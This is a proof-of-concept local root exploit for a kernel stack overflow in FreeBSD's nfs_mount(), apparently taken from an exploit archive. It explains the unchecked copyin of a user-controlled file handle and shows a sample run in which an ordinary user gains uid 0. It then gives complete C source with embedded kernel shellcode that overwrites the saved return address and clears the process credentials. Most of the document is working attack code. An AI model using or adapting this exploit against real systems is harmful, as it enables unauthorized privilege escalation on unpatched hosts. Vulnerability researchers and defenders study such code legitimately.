FreeBSD Kernel nfs_mount() Exploit

in

Description:
The vulnerability is in nfs_mount() which is reachable by the mount(2)
* and nmount(2) system calls. In order for them to be enabled for
* unprivileged users the sysctl(8) variable vfs.usermount must be set to a
* non-zero value. nfs_mount() employs an insufficient input validation method for copying
* data passed in the struct nfs_args from userspace to kernel.
* Specifically, the file handle to be mounted (nfs_args.fh) and its size
* (nfs_args.fhsize) are completely user-controllable. In file
sys/nfsclient/nfs_vfsops.c from 8.0-RELEASE:
*
* 1094 if (!has_fh_opt) {
* 1095 error = copyin((caddr_t)args.fh, (caddr_t)nfh,
* 1096 args.fhsize);
* 1097 if (error) {
* 1098 goto out;
* 1099 }
*
* The above can cause a kernel stack overflow which leads to privilege
* escalation in 7.3-RELEASE and 7.2-RELEASE, and a kernel crash /
* denial-of-service in 8.0-RELEASE (due to SSP/ProPolice). 7.1-RELEASE
* and earlier do not seem to be vulnerable since the bug was introduced in
* 7.2-RELEASE.
*
* Sample run:
*
* [argp@julius ~]$ uname -rsi
* FreeBSD 7.3-RELEASE GENERIC
* [argp@julius ~]$ sysctl vfs.usermount
* vfs.usermount: 1
* [argp@julius ~]$ id
* uid=1001(argp) gid=1001(argp) groups=1001(argp)
* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
* [argp@julius ~]$ ./nfs_mount_ex
*[*] calling nmount()
* [!] nmount error: -1030740736
* nmount: Unknown error: -1030740736
* [argp@julius ~]$ id
* uid=0(root) gid=0(wheel) egid=1001(argp) groups=1001(argp)
*
* $Id: nfs_mount_ex.c,v c1302ea1317d 2010/05/23 17:30:17 argp $
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define BUFSIZE 272

#define FSNAME "nfs"
#define DIRPATH "/tmp/nfs"

unsigned char kernelcode[] =
"\x64\xa1\x00\x00\x00\x00" /* movl %fs:0, %eax */
"\x8b\x40\x04" /* movl 0x4(%eax), %eax */
"\x8b\x40\x30" /* movl 0x30(%eax),%eax */
"\x31\xc9" /* xorl %ecx, %ecx */
"\x89\x48\x04" /* movl %ecx, 0x4(%eax) */
"\x89\x48\x08" /* movl %ecx, 0x8(%eax) */
"\x81\xc4\xb0\x01\x00\x00" /* addl $0x1b0, %esp */
"\x5b" /* popl %ebx */
"\x5e" /* popl %esi */
"\x5f" /* popl %edi */
"\x5d" /* popl %ebp */
"\xc3"; /* ret */

int
main()
{
char *ptr;
long *lptr;
struct nfs_args na;
struct iovec iov[6];

na.version = 3;
na.fh = calloc(BUFSIZE, sizeof(char));

if(na.fh == NULL)
{
perror("calloc");
exit(1);
}

memset(na.fh, 0x41, BUFSIZE);
na.fhsize = BUFSIZE;

ptr = (char *)na.fh;
lptr = (long *)(na.fh + BUFSIZE - 8);

*lptr++ = 0x12345678; /* saved %ebp */
*lptr++ = (u_long)ptr; /* saved %eip */

memcpy(ptr, kernelcode, (sizeof(kernelcode) - 1));

mkdir(DIRPATH, 0700);

iov[0].iov_base = "fstype";
iov[0].iov_len = strlen(iov[0].iov_base) + 1;

iov[1].iov_base = FSNAME;
iov[1].iov_len = strlen(iov[1].iov_base) + 1;

iov[2].iov_base = "fspath";
iov[2].iov_len = strlen(iov[2].iov_base) + 1;

iov[3].iov_base = DIRPATH;
iov[3].iov_len = strlen(iov[3].iov_base) + 1;

iov[4].iov_base = "nfs_args";
iov[4].iov_len = strlen(iov[4].iov_base) + 1;

iov[5].iov_base = &na;
iov[5].iov_len = sizeof(na);

printf("[*] calling nmount()\n");

if(nmount(iov, 6, 0) < 0)
{
fprintf(stderr, "[!] nmount error: %d\n", errno);
perror("nmount");
rmdir(DIRPATH);
free(na.fh);
exit(1);
}

printf("[*] unmounting and deleting %s\n", DIRPATH);

unmount(DIRPATH, 0);
rmdir(DIRPATH);
free(na.fh);

return 0;
}

/* EOF */